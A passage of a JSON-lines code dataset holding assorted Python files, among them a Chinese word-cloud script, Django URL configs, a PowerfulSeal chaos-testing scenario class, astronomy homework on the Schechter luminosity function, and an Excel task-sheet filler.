;')\nrows = cur.fetchall()\nconn.close()\n\n#变量声明\nwordsp_list=''\nstopwords=[]\n\n#读取停用词表\nf=open('stopwords.txt')\nfor line in open('stopwords.txt'):\n line=f.readline()\n stopwords.append(line.rstrip('\\n'))\nf.close()\n\n#生成每日词云表\nfor n in rows:\n str_list= n[-1]\n seg_list = jieba.cut(str_list, cut_all=False)\n for seg in seg_list:\n if seg not in stopwords:\n wordsp_list=wordsp_list+'/'.join(set(seg_list)-set(stopwords))\n\nmy_wordcloud = WordCloud( background_color='white',max_words=50,max_font_size=40).generate(wordsp_list)\n\n\n'''测试部分\n#显示词云图\nplt.imshow(my_wordcloud)\nplt.axis(\"off\")\nplt.show()\n'''\n\nyear = time.strftime(\"%Y\")\nmonth = time.strftime(\"%m\")\nday = time.strftime(\"%d\")\nfile='Sjzrb'+'_'+year+'_'+month+'_'+day\nmy_wordcloud.to_file(\"%s.png\"%(file))","sub_path":"Sjznews/dataanalysis/DA.py","file_name":"DA.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"148240670","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\n\nfrom __future__ import division\nimport sys\nimport argparse\nimport os\nfrom util import mkdir, image_trans\n\nthis_script_path = os.path.dirname(__file__)\nsys.path.insert(1, this_script_path + '/../src')\nimport Parser as rp\n\n\ndef read_params(args):\n parser = argparse.ArgumentParser(description='''beta heatmap | v1.0 at 2015/10/16 by liangzb ''')\n parser.add_argument('-d', '--beta_div_dir', dest='beta_dir', metavar='DIR', type=str, required=True,\n help=\"set the beta div dir, produced by beta_diversity.py\")\n parser.add_argument('-g', '--group_file', dest='group_file', metavar='FILE', type=str, required=True,\n help=\"set the group file\")\n parser.add_argument('-o', '--out_dir', dest='out_dir', metavar='DIR', type=str, required=True,\n help=\"set the output dir\")\n args = parser.parse_args()\n params = vars(args)\n return params\n\n\ndef work(r_job, name, params):\n file = os.popen('ls %s/%s*.txt' % (params['beta_dir'], name)).read().strip()\n pdf_file = '%s/%s.heatmap.pdf' % (params['out_dir'], name)\n png_file = '%s/%s.heatmap.png' % (params['out_dir'], name)\n R_file = '%s/%s.heatmap.R' % (params['out_dir'], name)\n distance_name = name.replace('_', ' ').title()\n vars = {'for_plot': file,\n 'group_file': params['group_file'],\n 'pdf_file': pdf_file,\n 'distance_name': distance_name}\n r_job.format(vars)\n r_job.write(R_file)\n r_job.run()\n image_trans(pdf_file, png_file)\n\n\nif __name__ == '__main__':\n params = read_params(sys.argv)\n mkdir(params['out_dir'])\n r_job = rp.Rparser()\n r_job.open(this_script_path + '/../src/template/04_beta_heatmap.Rtp')\n\n for name in ['weighted_unifrac', 'unweighted_unifrac']:\n work(r_job, name, params)\n","sub_path":"script/04_beta_heatmap.py","file_name":"04_beta_heatmap.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"307128878","text":"from django.conf.urls import url\nfrom . import views\napp_name = 'VK'\nVk = views.VK_api()\nurlpatterns = [\n url(r'^$', Vk.index,name= 'index'),\n url(r'^messages$', Vk.messages,name= 'messages'),\n url(r'^audio$', Vk.audio,name= 'audio'),\n\n\n ]","sub_path":"VK/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"462267732","text":"\n# Copyright 2017 Bloomberg Finance L.P.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport time\nimport re\nfrom datetime import datetime\nimport calendar\nimport random\nimport logging\nimport abc\n\nfrom powerfulseal.metriccollectors.stdout_collector import StdoutCollector\n\n\nclass Scenario():\n \"\"\" Basic class to represent a single testing scenario.\n\n Scenarios consist of 3 lists of things:\n - matches - to create the intial set of items\n - filters - to filter out the set\n - actions - to execute on all of the remaining items\n\n The scenarios are described using a yaml schema, that conforms\n to powerfulseal/policy/ps-schema.json JSON schema.\n\n This is a base class, containing some shared filters, shouldn't be\n used by itself. It's extended for both node and pod scenarios.\n \"\"\"\n\n def __init__(self, name, schema, logger=None, metric_collector=None):\n self.name = name\n self.schema = schema\n self.logger = logger or logging.getLogger(__name__ + \".\" + name)\n self.metric_collector = metric_collector or StdoutCollector()\n self.property_rewrite = {\n \"group\": \"groups\",\n }\n\n def execute(self):\n \"\"\" Main entry point to starting a scenario.\n\n It calls .match() to compute the intial set of items,\n then goes through all the filters in sequence,\n and finally executes all the actions on all remaining items.\n \"\"\"\n initial_set = self.match()\n self.logger.debug(\"Initial set: %r\", initial_set)\n self.logger.info(\"Initial set length: %d\", len(initial_set))\n filtered_set = self.filter(initial_set)\n self.logger.debug(\"Filtered set: %r\", filtered_set)\n self.logger.info(\"Filtered set length: %d\", len(filtered_set))\n self.act(filtered_set)\n self.logger.info(\"Done\")\n\n @abc.abstractmethod\n def match(self):\n \"\"\" Reads the policy and returns the initial set of items.\n \"\"\"\n pass # pragma: no cover\n\n def match_property(self, candidate, criterion):\n \"\"\" Helper method to match a property following some criterion.\n Turns the value into a regular expression.\n \"\"\"\n if not criterion:\n return False\n attr = criterion.get(\"name\")\n attr = self.property_rewrite.get(attr, attr)\n value = getattr(candidate, attr)\n expr = re.compile(criterion.get(\"value\"))\n if type(value) is list:\n return any([\n expr.match(str(v))\n for v in value\n ])\n else:\n value = str(value)\n return expr.match(value)\n\n def filter(self, items):\n \"\"\" Applies various filters based on the given policy.\n \"\"\"\n filters = self.schema.get(\"filters\", [])\n mapping = {\n \"property\": self.filter_property,\n \"dayTime\": self.filter_day_time,\n \"randomSample\": self.filter_random_sample,\n \"probability\": self.filter_probability,\n }\n return self.filter_mapping(items, filters, mapping)\n\n def filter_property(self, candidates, criterion):\n \"\"\" Filters out things which don't match their property filters.\n \"\"\"\n return [\n candidate for candidate in candidates\n if self.match_property(candidate, criterion)\n ]\n\n def filter_day_time(self, candidates, criterion, now=None):\n \"\"\" Passed unchanged list of candidates, if the execution time\n satisfies the policy requirements.\n \"\"\"\n now = now or datetime.now()\n self.logger.info(\"Now is %r\", now)\n\n # check the day is permitted\n day_name = calendar.day_name[now.weekday()].lower()\n permitted_days = criterion.get(\"onlyDays\", [])\n if permitted_days and day_name not in permitted_days:\n self.logger.info(\"Not allowed on %s\", day_name)\n return []\n\n # check the time is not too early\n start = criterion.get(\"startTime\", {})\n start_date = now.replace(\n hour=start.get(\"hour\", 10),\n minute=start.get(\"minute\", 0),\n second=start.get(\"second\", 0),\n )\n if now < start_date:\n self.logger.info(\"Too early\")\n return []\n\n # check the time is not too late\n end = criterion.get(\"endTime\", {})\n end_date = now.replace(\n hour=end.get(\"hour\", 15),\n minute=end.get(\"minute\", 59),\n second=end.get(\"second\", 59),\n )\n if now > end_date:\n self.logger.info(\"Too late\")\n return []\n\n return candidates\n\n def filter_random_sample(self, candidates, criterion):\n \"\"\" Returns a random sample from the initial list.\n It supports policy `size` and `ratio` features.\n \"\"\"\n if not criterion:\n return []\n size = criterion.get(\"size\")\n if size is None:\n ratio = criterion.get(\"ratio\", 1)\n size = int(len(candidates)*ratio)\n if size == 0:\n self.logger.info(\"RandomSample size 0\")\n return []\n return random.sample(candidates, size)\n\n def filter_probability(self, candidates, criterion):\n \"\"\" Returns the initial set unchanged with given probability.\n Returns empty list otherwise.\n \"\"\"\n proba = float(criterion.get(\"probabilityPassAll\", 0.5))\n if random.random() > proba:\n self.metric_collector.add_probability_filter_passed_no_nodes_filter()\n return []\n return candidates\n\n def filter_mapping(self, items, filters, mapping):\n \"\"\" Executes filters mapped to methods, based on policy keywords.\n \"\"\"\n for criterion in filters:\n filter_method = None\n filter_params = None\n for filter_type in mapping.keys():\n if filter_type in criterion:\n filter_method = mapping.get(filter_type)\n filter_params = criterion.get(filter_type)\n len_before = len(items)\n items = filter_method(items, filter_params)\n len_after = len(items)\n self.logger.info(\"Filter %s: %d -> %d items\", filter_type, len_before, len_after)\n break\n if not items:\n self.logger.info(\"Empty set after %r\", criterion)\n break\n\n if not items:\n self.metric_collector.add_filtered_to_empty_set_metric()\n\n return items\n\n @abc.abstractmethod\n def act(self, items):\n \"\"\" Execute policy's actions on the items,\n \"\"\"\n pass # pragma: no cover\n\n def action_wait(self, item, params):\n \"\"\" Waits x seconds, according to the policy.\n \"\"\"\n sleep_time = params.get(\"seconds\", 0)\n self.logger.info(\"Action sleep for %s seconds\", sleep_time)\n time.sleep(sleep_time)\n\n def act_mapping(self, items, actions, mapping):\n \"\"\" Executes all the actions on the list of pods.\n \"\"\"\n for action in actions:\n for key, method in mapping.items():\n if key in action:\n params = action.get(key)\n for item in items:\n method(item, params)\n # special case - if we're waiting, only do that on first item\n if key == \"wait\":\n break\n\n\n","sub_path":"powerfulseal/policy/scenario.py","file_name":"scenario.py","file_ext":"py","file_size_in_byte":8041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"581136680","text":"from . import views\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\n\nurlpatterns = [\n path('', views.index),\n\n path('test', views.test, name='test'),\n path('signup', views.signup_view, name='signup'),\n path('login', views.login_view, name='login'),\n path('logout', views.logout_view, name='logout'),\n path('booster', views.booster, name='booster'),\n path('downloadpage/', views.downloadpage, name='downloadpage'), # url contains object id ( oid ) which is use to\n path('downloadpage/download/', views.download, name='download'),\n path('upload_form', views.upload_form, name='upload_form'), # display the content on download page.\n path('profile_form', views.profile_form, name='profile_form'),\n path('profile_page', views.profile_page, name='profile_page'),\n path('profile_page/user_settings', views.user_settings, name='user_settings'),\n path('', views.next_index),\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","sub_path":"Userdb/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"516518623","text":"from spacy.lang.en import English\n\nnlp = English()\n\n# Обработка текста\ndoc = nlp(\n \"In 1990, more than 60% of people in East Asia were in extreme poverty. \"\n \"Now less than 4% are.\"\n)\n\n# Перебор токенов документа doc\nfor token in doc:\n # Проверка на соответствие токена числу\n if ____.____:\n # Получение следующего токена документа\n next_token = ____[____]\n # Проверка на равенство текстового значения следующего токена знаку \"%\"\n if next_token.____ == \"%\":\n print(\"Найдено значение процента:\", token.text)\n","sub_path":"exercises/ru/exc_01_04.py","file_name":"exc_01_04.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"36434043","text":"from datetime import datetime\n\nfrom django.core.exceptions import ValidationError\n\n\ndef validate_year(year):\n current_year = datetime.now().year\n if year > current_year:\n raise ValidationError(\n f'Год произведения не может быть больше, чем {current_year}!'\n )\n","sub_path":"api_yamdb/api/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"618976941","text":"# coding: utf-8\nfrom django.conf.urls import *\nimport views\nimport feeds\n\nurlpatterns = patterns('',\n url(r'^$', views.index, name='index'),\n url(r'^facet_explore/$', views.facet_explore, name='facet_explore'),\n url(r'^income/$', views.participant_income, name='participant_income'),\n url(r'^rss/$', feeds.LatestEntriesFeed(), name='rss'),\n url(r'^ecatalog/$', views.index, name='ecatalog', kwargs={'catalog':'sc2'}),\n url(r'^ecollection/$', views.index, name='ecollection', kwargs={'catalog':'ebooks'}),\n url(r'^detail/(?P[A-Za-z]+)/$', views.detail, name='detail'),\n url(r'^select/library/$', views.select_library, name='select_library'),\n url(r'^statictics/$', views.statictics, name='statictics'),\n url(r'^requests/$', views.saved_search_requests, name='saved_search_requests'),\n url(r'^requests/save/$', views.save_search_request, name='save_search_request'),\n url(r'^requests/delete/(?P\\d+)/$', views.delete_search_request, name='delete_search_request'),\n url(r'^print/(?P[A-Za-z]+)/$', views.to_print, name='to_print'),\n url(r'^print_to_pdf/$', views.print_to_pdf, name='print_to_pdf'),\n # url(r'^collections/$', views.get_collections, name='collections'),\n)\n","sub_path":"libcms/apps/ssearch/frontend/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"609301539","text":"#!/usr/bin/python\n\ndef problem_1b(show=True):\n import matplotlib.pyplot as plt\n import numpy as np\n\n phi_star = 1.64e-2 # h^3 Mpc^-2\n h = 0.7\n m_star = -19.67 + 5*np.log10(h)\n alpha = -1.21\n m_array = np.arange(-24 + 5*np.log10(h), -10 + 5*np.log10(h),0.01)\n #print m_array\n\n prob_dens = schechter(m_array, alpha, m_star, phi_star)\n\n # Create figure\n fig = plt.figure(figsize=(8,8))\n ax = fig.add_subplot(111)\n\n ax.plot((m_array - 5*np.log10(h)).T, (np.log10(prob_dens)).T )\n\n ax.set_ylim([-6,-1])\n ax.set_xlim([-13.1,-22.9])\n\n # Adjust asthetics\n ax.set_xlabel(r'M$_{\\rm bj}$ - 5log(h)',\n size = 'small',\n family='serif')\n ax.set_ylabel(r'log($\\phi$ / [h$^3$Mpc$^{-3}$mag$^{-1}$])',\n size = 'small',\n family='serif')\n ax.set_title('1b: Luminosity function of galaxies shown in 2.25')\n ax.grid(True)\n\n if True:\n plt.savefig('hw1.1b.png',bbox_inches='tight',dpi=500)\n if show:\n fig.show()\n\ndef schechter(m_array, alpha, m_star, phi_star):\n import numpy as np\n\n prob_dens = np.log(10) / 2.5 * phi_star * \\\n (10**(-0.4*(m_array - m_star)))**(alpha+1) *\\\n np.exp(-10**(-0.4*(m_array - m_star)))\n\n return prob_dens\n\ndef problem_1c(show=True, N=10**3):\n import matplotlib.pyplot as plt\n import numpy as np\n\n # define schechter function parameters\n phi_star = 1.64e-2 # h^3 Mpc^-2\n h = 0.7\n m_star = -19.67 + 5*np.log10(h)\n alpha = -1.21\n M_binsize = 0.1\n m_array = np.arange(-22.5 + 5*np.log10(h), -13.1 + 5*np.log10(h),\n M_binsize)\n\n # create distribution of M\n prob_dens = schechter(m_array, alpha, m_star, phi_star)\n\n # integrate\n prob = (prob_dens * M_binsize).sum()\n volume = N / prob * M_binsize\n\n # get number of galaxies with Magnitude M\n N_galaxies_dM = prob_dens * volume\n\n # galaxies = N_galaxies / (volume * (m_array[1] - m_array[0]))\n\n distances = np.random.random(N) * .98e9 + .020e6 # Mpc\n\n # Move each individual galaxy to given distance,\n # calculate apparent magnitude\n count = 0\n apparent_mags = np.zeros(distances.shape)\n for i in range(len(m_array)):\n for j in range(int(N_galaxies_dM[i])):\n apparent_mags[count + j] = m_array[i] + \\\n 5*np.log10(distances[count + j]/10.)\n count += N_galaxies_dM[i]\n\n plot_problem_1c(apparent_mags, show=show)\n\ndef plot_problem_1c(apparent_mags, show=True):\n import matplotlib.pyplot as plt\n import numpy as np\n\n # Create figure\n fig = plt.figure(figsize=(8,8))\n ax = fig.add_subplot(111)\n\n ax.hist(apparent_mags,bins=100, histtype='step', color='k')\n\n #ax.set_ylim([-6,-1])\n ax.set_xlim([27,10])\n\n # Adjust asthetics\n ax.set_xlabel(r'm$_{bj}$ [magnitudes]',\n size = 'small',\n family='serif')\n ax.set_ylabel(r'N',\n size = 'small',\n family='serif')\n ax.set_title('1c: Number density of galaxy apparent magnitudes.')\n ax.grid(True)\n\n if True:\n plt.savefig('hw1.1c.png',bbox_inches='tight')\n if show:\n fig.show()\n\ndef problem_1d(show=True, N=10**5):\n import matplotlib.pyplot as plt\n import numpy as np\n\n # define schechter function parameters\n phi_star = 1.64e-2 # h^3 Mpc^-2\n h = 0.7\n m_star = -19.67 + 5*np.log10(h)\n alpha = -1.21\n M_binsize = 0.1\n m_array = np.arange(-22.5 + 5*np.log10(h), -13.1 + 5*np.log10(h),\n M_binsize)\n\n # create distribution of M\n prob_dens = schechter(m_array, alpha, m_star, phi_star)\n\n # integrate\n prob = (prob_dens * M_binsize).sum()\n volume = N / prob * M_binsize\n\n # get number of galaxies with Magnitude M\n N_galaxies_dM = prob_dens * volume\n # galaxies = N_galaxies / (volume * (m_array[1] - m_array[0]))\n\n distances = np.random.random(N) * .98e9 + .020e6 # Mpc\n\n # Move each individual galaxy to given distance,\n # calculate apparent magnitude\n #apparent_mags = np.zeros(N)\n #for i, distance in enumerate(distances):\n # for j in range(len(N_galaxies_dM)):\n # apparent_mags[i] = m_array[j] + 5*np.log10(distance/10.)\n\n # Move each individual galaxy to given distance,\n # calculate apparent magnitude\n count = 0\n apparent_mags = np.zeros(distances.shape)\n for i in range(len(m_array)):\n for j in range(int(N_galaxies_dM[i])):\n apparent_mags[count + j] = m_array[i] + \\\n 5*np.log10(distances[count + j]/10.)\n count += N_galaxies_dM[i]\n\n count = 0\n N_galaxies_cut = np.zeros(m_array.shape)\n for i in range(len(m_array)):\n for j in range(int(N_galaxies_dM[i])):\n if apparent_mags[count + j] < 20:\n N_galaxies_cut[i] += 1\n count += N_galaxies_dM[i]\n\n plot_problem_1d(m_array=m_array, N_galaxies_dM=N_galaxies_dM,\n N_galaxies_cut=N_galaxies_cut, apparent_mags=apparent_mags, show=show)\n\ndef plot_problem_1d(m_array=None, N_galaxies_dM=None,\n N_galaxies_cut=None, apparent_mags=None, show=True):\n import matplotlib.pyplot as plt\n import numpy as np\n\n # Create figure\n fig = plt.figure(figsize=(8,8))\n ax = fig.add_subplot(111)\n\n ax.plot(m_array,N_galaxies_dM,\n color='g', label='Untrimmed',\n drawstyle='steps')\n\n ax.plot(m_array,N_galaxies_cut,\n color='r', label='Magnitude-limited',\n drawstyle='steps-pre')\n\n ax.set_xlim([-13.1,-22.9])\n ax.set_ylim([1,10**4])\n ax.set_yscale('log')\n\n # Adjust asthetics\n ax.set_xlabel(r'M [magnitude]',\n size = 'small',\n family='serif')\n ax.set_ylabel(r'N',\n size = 'small',\n family='serif')\n ax.set_title('1d: Histogram of Absolute Magnitudes')\n ax.grid(True)\n ax.legend(loc='lower left')\n\n if True:\n plt.savefig('hw1.1d.png',bbox_inches='tight',dpi=500)\n if show:\n fig.show()\n\ndef problems_1fgh(show=True, N=10**5, distance_bin=1):\n\n '''\n Parameters\n ----------\n distance_bin : float\n In units of Mpc\n\n '''\n\n import matplotlib.pyplot as plt\n import numpy as np\n\n # define schechter function parameters\n phi_star = 1.64e-2 # h^3 Mpc^-2\n h = 0.7\n m_star = -19.67 + 5*np.log10(h)\n alpha = -1.21\n M_binsize = 0.1\n m_array = np.arange(-22.5 + 5*np.log10(h), -13.1 + 5*np.log10(h),\n M_binsize)\n\n # create distribution of M\n prob_dens = schechter(m_array, alpha, m_star, phi_star)\n\n # integrate\n prob = (prob_dens * (m_array[1] - m_array[0])).sum()\n volume = N / prob * M_binsize\n\n # get number of galaxies with Magnitude M\n N_galaxies_dM_untrimmed = prob_dens * volume\n\n # Calulate random distances between 20 and 1000 Mpc\n distances = np.random.random(N) * .98e9 + .020e9 # pc\n indices = distances.argsort()\n\n # There must be at least 1 galaxy in the last slice\n N_1000 = 0\n while N_1000 == 0:\n # find number of galaxies at farthest distance\n N_1000 = distances[distances > 1e9 - distance_bin * 1e6].size\n distance_bin += 0.1\n\n # find volume of farthest distance\n volume_1000 = N_1000 / prob * M_binsize\n\n N_volume_bins = int((1000 - 20) / distance_bin)\n\n N_galaxies_dM_array = np.zeros(shape=(prob_dens.shape[0], N_volume_bins))\n\n volume_farther = volume_1000\n distance_farther = 1000 - distance_bin\n N_galaxies_dM_array[:,0] = N_1000\n\n # Define the number of galaxies in each volume bin\n for i in range(1,N_volume_bins):\n distance_closer = distance_farther - distance_bin\n volume_closer = volume_farther * \\\n distance_closer**2 / distance_farther**2\n\n # get number of galaxies between Magnitude M and M+dM\n N_galaxies_dM_array[:,i] = prob_dens * volume_closer\n\n # perform again on next volume slice\n volume_farther = volume_closer\n distance_farther = distance_closer\n\n # Calculate total numbe rof galaxies\n N_galaxies = N_galaxies_dM_array.sum()\n\n print('Total number of galaxies in volume-limited sample = ' + \\\n str(int(N_galaxies)))\n\n # Calculate the number of galaxies between absolute mag M and M + dM\n N_galaxies_dM = N_galaxies_dM_array.sum(axis=1)\n\n # Calulate random distances between 20 and 1000 Mpc now for the number of\n # galaxies in the volume limited sample\n distances = np.random.random(N_galaxies) \\\n * .98e9 + .020e9 # pc\n\n # calculate apparent magnitude\n count = 0\n apparent_mags = np.zeros(distances.shape)\n for i in range(len(m_array)):\n for j in range(int(N_galaxies_dM[i])):\n apparent_mags[count + j] = m_array[i] + \\\n 5*np.log10(distances[count + j]/10.)\n count += N_galaxies_dM[i]\n\n # Find galaxies with m < 20\n count = 0\n N_galaxies_cut = np.zeros(m_array.shape)\n distances_cut = []\n m_array_distances = []\n for i in range(len(m_array)):\n for j in range(int(N_galaxies_dM[i])):\n if apparent_mags[count + j] < 20:\n N_galaxies_cut[i] += 1\n distances_cut.append(distances[count + j])\n m_array_distances.append(m_array[i])\n count += N_galaxies_dM[i]\n\n # problem 1f\n ############\n plot_problem_1f(m_array=m_array, N_galaxies_cut=N_galaxies_cut,\n N_galaxies_dM=N_galaxies_dM,\n N_galaxies_dM_untrimmed=N_galaxies_dM_untrimmed, show=show)\n\n\n # problem 1g\n ############\n apparent_mags_binsize = 50\n apparent_mags_cut = apparent_mags[apparent_mags < 20]\n bins = len(apparent_mags_cut) / apparent_mags_binsize\n\n N_apparent_mags, apparent_mags_bin = \\\n np.histogram(apparent_mags_cut, bins=bins)\n\n # calculate fraction near limiting magnitude\n limiting_indices = np.where(apparent_mags_bin[:-1] > 19.5)[0]\n sample_total_N = N_apparent_mags.sum()\n limiting_fraction = N_apparent_mags[limiting_indices[-1]] / \\\n float(sample_total_N)\n print('Fraction of sample within 0.5 magnitudes of the limiting' + \\\n ' magnitude = %.2f' % limiting_fraction)\n\n plot_problem_1g(apparent_mags_bin=apparent_mags_bin,\n N_apparent_mags=N_apparent_mags, show=show)\n\n\n # problem 1h\n ############\n plot_problem_1h(m_array_distances=np.asarray(m_array_distances),\n distances_cut=np.asarray(distances_cut), show=show)\n\ndef plot_problem_1f(m_array=None, N_galaxies_cut=None, N_galaxies_dM=None,\n N_galaxies_dM_untrimmed=None, show=True):\n\n import matplotlib.pyplot as plt\n import numpy as np\n # Create figure\n fig = plt.figure(figsize=(8,8))\n ax = fig.add_subplot(111)\n\n ax.plot(m_array,N_galaxies_dM_untrimmed,\n color='b', label='Untrimmed', linestyle='-',\n drawstyle='steps')\n ax.plot(m_array,N_galaxies_dM,\n color='r', label='Volume-limited', linestyle='-',\n drawstyle='steps')\n ax.plot(m_array,N_galaxies_cut,\n color='g', label='Magnitude- and Volume-limited', linestyle='-',\n drawstyle='steps')\n\n ax.set_xlim([-13.1,-22.9])\n ax.set_ylim([1,10**4])\n ax.set_yscale('log')\n\n # Adjust asthetics\n ax.set_xlabel(r'M [magnitude]',\n size = 'small',\n family='serif')\n ax.set_ylabel(r'N',\n size = 'small',\n family='serif')\n ax.set_title(r'1f: Luminosity function of magnitude limited sample')\n ax.grid(True)\n ax.legend(loc='lower left')\n\n if True:\n plt.savefig('hw1.1f.png',bbox_inches='tight',dpi=500)\n if show:\n fig.show()\n\ndef plot_problem_1g(apparent_mags_bin=None, N_apparent_mags=None, show=True):\n import matplotlib.pyplot as plt\n import numpy as np\n\n # Create figure\n fig = plt.figure(figsize=(8,8))\n ax = fig.add_subplot(111)\n\n ax.plot(apparent_mags_bin[:-1], N_apparent_mags,\n color='g', label='Untrimmed', linestyle='-',\n drawstyle='steps-post')\n\n ax.set_xlim([17,20.5])\n #ax.set_yscale('log')\n\n # Adjust asthetics\n ax.set_xlabel(r'm$_{bj}$',\n size = 'small',\n family='serif')\n ax.set_ylabel(r'N',\n size = 'small',\n family='serif')\n ax.set_title(r'1g: Number of galaxies in volume-limited sample')\n ax.grid(True)\n\n if True:\n plt.savefig('hw1.1g.png',bbox_inches='tight',dpi=500)\n if show:\n fig.show()\n\ndef plot_problem_1h(m_array_distances=None, distances_cut=None, show=True):\n import matplotlib.pyplot as plt\n import numpy as np\n # Create figure\n fig = plt.figure(figsize=(8,8))\n ax = fig.add_subplot(111)\n\n ax.scatter(m_array_distances, distances_cut/1e6,\n color='k', label='Untrimmed', alpha=0.1)\n\n #ax.set_xlim([-13.1,-22.9])\n #ax.set_yscale('log')\n\n # Adjust asthetics\n ax.set_xlabel(r'M [magnitudes]',\n size = 'small',\n family='serif')\n ax.set_ylabel(r'Distance [Mpc]',\n size = 'small',\n family='serif')\n ax.set_title(r'1h: Distance vs. M in volume-limited sample')\n ax.grid(True)\n\n if True:\n plt.savefig('hw1.1h.png',bbox_inches='tight',dpi=500)\n if show:\n fig.show()\n\ndef main():\n import numpy as np\n\n N = 10**5\n show = False\n\n #problem_1b(show=show)\n\n problem_1c(N=N, show=show)\n\n problem_1d(N=N, show=show)\n\n problems_1fgh(N=N, show=show)\n\nif __name__ == '__main__':\n main()\n","sub_path":"classes/galaxies/hw1/hw1.py","file_name":"hw1.py","file_ext":"py","file_size_in_byte":13482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"431451330","text":"import xlrd,openpyxl,sys,os,time\nfrom openpyxl.styles import PatternFill, Border, Side, Alignment, Protection, Font\nfrom openpyxl.styles.colors import BLACK\n\nstrDes='''\n====================================================================\n\t\t1.智能脚本填充工具 - Smart BOOKMARK UPgrade\n\t\t2.版本信息创建 - Valuation System Version Create\n\t\t Python By 3.7.1 by Spake\n====================================================================\n\t'''\n\n\nstrLocalFolder = ''#本地目录\nexcel_path = ''#源文件目录\nbook_path = ''#生成目标文件目录\nTask_Number = 0\nCustomer = 0\nCustomID = 0\nType = 0\nVersionID = ''#版本号\n\ndef _init():\n\n global strLocalFolder\n global excel_path\n global book_path\n # 获取目录\n strLocalFolder = os.getcwd()#D:\\git\\excel_mate\\file\\估值_FD20170307-D28升级说明-相泽峰 .xlsx\n book_path = strLocalFolder + r'\\估值_FD20170307-D28升级说明-相泽峰 .xlsx'\n for root, dirs, files in os.walk(strLocalFolder):\n for file in files:\n if file.find('TaskDetail')>=0:\n excel_path = strLocalFolder +r'/'+file\n\n\n\n\nclass _Tasks:\n def __init__(self):\n self.Task = {'任务编号':'' , '需求提出方':'' , '需���编号':'' , '类型':''}\n self.Tasks = []\n\n def Append_Rwbh(self,data):\n self.Task['任务编号'] = data[0]\n self.Task['需求提出方'] = data[1]\n self.Task['需求编号'] = data[2]\n self.Task['类型'] = data[3]\n self.Tasks.append(dict(self.Task))\n\n\n# https://www.cnblogs.com/linyfeng/p/7123423.html\n# 打开excel文件并获取所有sheet xlrd.open_workbook\n# 根据下标获取sheet名称 sheet2_name=workbook.sheet_names()[1]\n# 获取sheet名称、行数、列数 workbook.sheet_by_index(1) sheet2.name, sheet2.nrows, sheet2.ncols\n# 根据sheet名称获取整行和整列的值 sheet2.row_values(3) sheet2.col_values(2)\n# 获取指定单元格的内容 sheet2.cell(1,0).value.encode('utf-8') sheet2.cell_value(1,0).encode('utf-8') print sheet2.row(1)[0].value.encode('utf-8')\n# 获取单元格内容的数据类型 sheet2.cell(1,0).ctype\n\n# 1、先读取第一行 查找以下字符串 并记录所在列数:\n# Task_Number任务编号 Customer 需求提出方 CustomID 对应的需求点编号 Type类型\n# 2、根据数字 提取每一行的关键信息 添加到Tasks类里\n# 3、数据下发(待开发)\n\n\ndef read_excel():\n global excel_path\n global Task_Number\n global Customer\n global CustomID\n global Type\n wb = xlrd.open_workbook(excel_path)\n sheet_name = wb.sheet_names()[0]\n sheet = wb.sheet_by_name(sheet_name)\n rows = sheet.row_values(0)\n i = 0\n for row in rows:\n if row.find('任务编号')>=0:\n Task_Number = i\n if row.find('需求提出方')>=0:\n Customer = i\n if row.find('对应的需求点编号')>=0:\n CustomID = i\n if row.find('类型')>=0:\n Type = i\n i += 1\n Task_datas = _Tasks()\n Bug_dates = _Tasks()\n Task_info = []\n for j in range(1,sheet.nrows):\n Task_info.append(sheet.row_values(j)[Task_Number])\n Task_info.append(sheet.row_values(j)[Customer])\n Task_info.append(sheet.row_values(j)[CustomID])\n Task_info.append(sheet.row_values(j)[Type])\n if sheet.row_values(j)[Type].find('缺陷')>= 0:\n Bug_dates.Append_Rwbh(Task_info)\n else:\n Task_datas.Append_Rwbh(Task_info)\n Task_info.clear()\n\n return Task_datas.Tasks, Bug_dates.Tasks\n\n\ndef write_excel(bugs,tasks):\n global book_path\n global strLocalFolder\n wb = openpyxl.load_workbook(book_path)\n wb.worksheets[0].cell(row = 1 ,column= 1).value = VersionID + '(注意事项)'\n\n\n ws_bug = wb.worksheets[1]\n\n # 复制单元格格式\n font_1 = Font(name='宋体', charset=134, family=None, b=False, i=False, strike=None, outline=None, shadow=None, condense=None, color=None, extend=None, sz=10.0, u=None, vertAlign=None, scheme=None)\n Border_1 = Border(outline=True, diagonalUp=False, diagonalDown=False, start=None, end=None,\n left=Side(style='thin', color = BLACK),\n right=Side(style='thin', color = BLACK),\n top=Side(style='thin', color = BLACK),\n bottom=Side(style='thin', color = BLACK),\n diagonal=Side(style=None, color=None),\n diagonal_direction=0,\n )\n # Border_1 = ws_bug.cell(row=4, 